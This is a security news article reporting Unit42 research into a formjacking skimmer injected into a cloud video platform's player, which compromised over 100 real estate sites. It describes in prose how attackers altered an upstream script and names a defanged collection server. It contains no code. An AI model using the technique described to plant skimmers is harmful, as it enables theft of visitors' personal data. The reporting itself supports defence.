Supply chain attacks can devastate organizations’ critical infrastructures as one single weak link can enable threat actors to victimize the entire network. Recently, security experts from Unit42 found a supply chain attack using a cloud video platform to spread a formjacking skimmer. The researchers claim they’ve detected over 100 real estate sites compromised by the same skimmer attack.
In formjacking attacks, hackers inject malicious JavaScript code into the victim’s website to compromise and steal sensitive information. The deployed malware code alters the behavior of the targeted website without a user’s knowledge.
The researchers stated the skimmer has harvested victims’ sensitive information such as names, emails, phone numbers and sent them to a collection server – https://cdn-imgcloud[.]com/img, which is also malicious.
Also Read: Indian Users Third Most Affected by Formjacking Attacks
“The skimmer itself is highly polymorphic, elusive, and continuously evolving. When combined with cloud distribution platforms, the impact of a skimmer of this type could be very large. For these reasons, attacks like this raise the stakes for security researchers to untangle their sophisticated strategies and trace them to the root cause. We have to invent more sophisticated strategies to detect skimmer campaigns of this type since merely blocking domain names or URLs used by skimmers is ineffective,” the researchers said.
Hackers Deploy Malicious Code in Video
Unit42 researchers stated that attackers injected the skimmer codes into the player of the cloud video platform. It automatically downloads whenever a user imports the video embedded with malicious codes. Explaining how hackers injected the skimmer into the video, the researchers added, “When the cloud platform user creates a player, the user is allowed to add their own JavaScript customizations by uploading a JavaScript file to be included in their player. In this specific instance, the user uploaded a script that could be modified upstream to include malicious content. We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.”